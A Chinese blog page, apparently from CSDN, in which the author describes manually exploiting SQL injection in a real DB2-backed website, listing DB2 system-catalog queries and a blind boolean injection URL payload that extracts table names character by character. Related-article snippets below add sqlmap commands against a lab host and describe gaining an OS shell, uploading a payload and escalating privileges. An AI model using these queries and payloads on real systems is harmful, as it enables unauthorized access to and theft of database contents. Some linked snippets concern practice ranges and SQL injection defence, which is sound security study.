sqlinjection in db2数据库

最新推荐文章于 2024-07-22 19:32:38 发布
最新推荐文章于 2024-07-22 19:32:38 发布
阅读量330 收藏
点赞数
文章标签: spl db 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kclax/article/details/90528468
版权

使用DB2的人比较少了,今天碰到了一个可供注入的DB2网站,想试试身手。不过在网上很难找到相关的资料,只好自己研究了。
参考了IBM DB2的文档,总结了这样几条:
1、select NAME from SYSIBM.SYSTABLES where CREATOR =USER
可以返回系统中所有用户创建的表(table)名
2、select NAME from SYSIBM.SYSCOLUMNS where TBCREATOR = ‘’ and TBNAME=’’
返回表中的列名
3、select NAME from SYSIBM.SYSTABLES where CREATOR =USER FETCH FIRST 1 ROWS ONLY
这是最关键的地方,返回第一条记录,类似于sql server中的top 1
4、SUBSTR(string, position, length)
返回字符串子串的函数,类似于mid
5、ASCII()这个就不用多说了。
有了这些语句和函数,我们就可以很方便的用ascii拆半法猜出所有的table名,字段名,以及其中的数据了。
例如判断第一个table的名称的第一个字符的ascii码是否大于50:
http://*.com?test.jsp?id=1 and (select ASCII(SUBSTR(NAME,1,1)) from SYSIBM.SYSTABLES where CREATOR =USER FETCH FIRST 1 ROWS ONLY)>50 –

http://blog.waynedeng.com/blogview.asp?logID=543

Coisini、
关注
DB2数据库SQL注入手册1
08-08
DB2数据库SQL注入手册1
小迪安全26WEB 攻防-通用漏洞&SQL 注入 &Sqlmap&Oracle&Mongodb&DB2
weixin_73760178的博客
02-18 1259
通过sqlmap找到管理员账号和密码,从而登入后台,再利用后台进行os-shell的连接实现shell交互,此时通过shell交互便可获取到对方服务器的IP等敏感信息,同时,在自己的服务器中开启监听,利用高级权限读写文件,向对服务器写入payload(.exe)并运行,实现上线服务器,然后在监听过程中开启msf,从而提权。猜回显位:用的是单引号,进行猜测,因为在数据库中加入单引号是一种字符类型的,通过SQL语句,判断之后的数据是否能正常的显示页面,从而进行判断注入点。测回显:/new_list.php?
墨者学院“SQL手工注入漏洞测试(Db2数据库)”攻略
qq_68186313的博客
07-22 177
墨者学院“SQL手工注入漏洞测试(Db2数据库)”攻略
java db2 sql 防注入_Hibernate使用中,防止SQL注入的一些措施
weixin_35955473的博客
02-13 315
Hibernate是一个开放源代码的对象关系映射框架,它对JDBC进行了非常轻量级的对象封装,使得Java程序员可以随心所欲的使用对象编程思维来操纵数据库。在获取便利操作的同时,SQL的注入问题也值得我们的密切注意,下面就来谈谈几点如何避免SQL注入:1.对参数名称进行绑定:Query query=session.createQuery(hql);query.setString(“name”,na...
SQL注入漏洞测试(布尔盲注)
qq_45883601的博客
12-06 319
使用Sqlmap工具注入 1、首先获取数据库名 Python sqlmap.py -u"http://219.153.49.228:49953/new_list.php?id=1" --current-db 2、
db2数据库安装包、db2数据库安装驱动
09-02
DB2IBM公司开发的一款关系型数据库管理系统,广泛应用于企业级数据存储和管理。本压缩包包含DB2数据库的安装包以及链接服务器驱动,对于理解DB2数据库的安装过程和使用至关重要。 首先,我们来详细了解DB2数据库...
db2数据库驱动9.7jar包
05-10
在Java编程环境中,为了能够与DB2数据库进行交互,如执行SQL查询、更新数据或管理数据库对象,需要引入特定的驱动程序。在这个案例中,我们有两个主要的JAR文件:db2jcc4.jar和db2jcc.jar。 1. **db2jcc4.jar** - ...
DB2数据库SQLServer数据库的异同.doc
06-16
DB2数据库SQLServer数据库的异同 DB2、Oracle、SQLServer数据库可以说是数据库领域的三座大山。这三座大山各有各的 特色。为此企业在选型的时候往往会在这三个数据库之间犹豫,不知道该选哪个数据库 好。笔者这里...
DB2数据库网络协议分析报告
11-24
DRDA是IBM设计的一个标准,旨在促进跨平台的数据访问,符合SQL标准,适用于IBMDB2DBM、SQL/DS和SQL/400数据库系统,同时支持多供应商的数据库集成。它定义了客户机和数据库服务器之间的接口,支持分布式事务处理...
sql server 字符串拼接_Python操作db2数据库时如何防止SQL注入
weixin_39763033的博客
12-06 246
QL注入就是攻击者在前端的表单输入中,或者 API 的传参时,按照 SQL 的语法,人为地加入一段代码,改变原有的SQL 逻辑,来跳过验证,篡改或者删除数据库,达到攻击者的目的的过程。SQL注入攻击会造成非常严重的后果,举个例子:select user_id,user_name from user_info where user_name = '$a' and passwd = '$pwd'一般情...
DB2数据库SQL注入语句
02-17
可以试试学习一下,不可以滥用, 猜用户表数量: and 0<(SELECT count(NAME) FROM SYSIBM.SYSTABLES where CREATOR=USER)
web安全之SQL注入(三)
Delity的博客
06-17 1492
一、sql注入的介绍 SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 二、sql注入的危害 但凡使用数据库开发的应用系统,就可能存在SQL注入攻击的媒介。自1999年起,SQL注入漏洞就成了常见安全漏洞之一。至今SQL注入漏洞仍然在CVE列表中排前10。 1.数据库信息泄露 2.网页篡改:登陆
DB2SQL总结
GonderGuo的博客
08-30 935
一、注意事项 1.查询尽量避免使用*,*会去字典中查询一次增加开销 2.避免使用not in的情况,因为这种情况会使索引失效 3.查询操作较多的字段尽量建立索引,但是经常进行修改的字段最好不要添加索引 4.避免类型不一致导致的索引失效,字符型不要写成int型 5.数据分布不一致的索引自己通过判断决定是否使用索引 并发场景下应该注意的几点问题 1.事务不要开得太大,容易长时间占有链接,锁无法释放导致极易出现死锁 2.事务中只封装必要的操作,查询语句尽量不要放进去,缩短事务时间 3.事务中如果出现大量更新操作,
墨者 - SQL手工注入漏洞测试(Db2数据库)
吃肉唐僧的博客
07-11 2769
进入环境,用order by测试,发现可以,并测试到字段为4 接下来用union select 1,2,3,4 发现失败 后来上网看了别人的思路是union select 1,2,3,4 from sysibm.systables就可以回显了 应该是不同的数据库语法问题 爆库 id=2 union select 1,2,current schema,4 from sysibm...
DB2数据库注入
Vi_vids的博客
03-26 1329
db2数据库 这里使用的靶场为墨者学院在线靶场 确定字段数 确定回显位 id=-1 union select 1,2,3,4 from syscat.tables 查看数据库基本信息/爆库 爆表可以使用的表可以是syscat.tables,也可以是syscat.columns、sysibm.sysdummy1 科普时间 sysibm.sysdummy1 表是DB2数据库中的系统表,存放着系统的相关信息 id=-1 union select 1,current schema,current s
sql优化2:db2关于 in (常量...)优化建议
njhart2003的专栏
07-23 3265
 我们在设计程序里,经常碰到需要态组装sql条件的情况,例如,下面是从后台抓取的sql:update MAT_REQPLAN set GATHERFLAG=1 where 1=1and REQPLAN_ID in (select distinct REQPLAN_ID                   from MAT_MATERIAL   where MATERIAL_ID in (0,2
WEB攻防-通用漏洞&SQL注入-sqlmap基本使用&墨者靶场
m0_65336233的博客
10-09 1748
WEB攻防-通用漏洞&SQL注入
【墨者靶场】sql注入Db2数据库
最新发布
qq_70836100的博客
07-22 216
地址:https://www.mozhe.cn/bug/detail/NjM3MSt5VWovcWtHOU9kaUF5dUFXQT09bW96aGUmozhe。2.此题思路是去找注入点,点击图中的通知,没有就刷新。8.这里需要对密码进行解码,再登陆就会有KEY。这里的字段name,password被隐藏了。3.使用sqlmap,查询数据库。1.首先启动(3墨币)7.查password。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值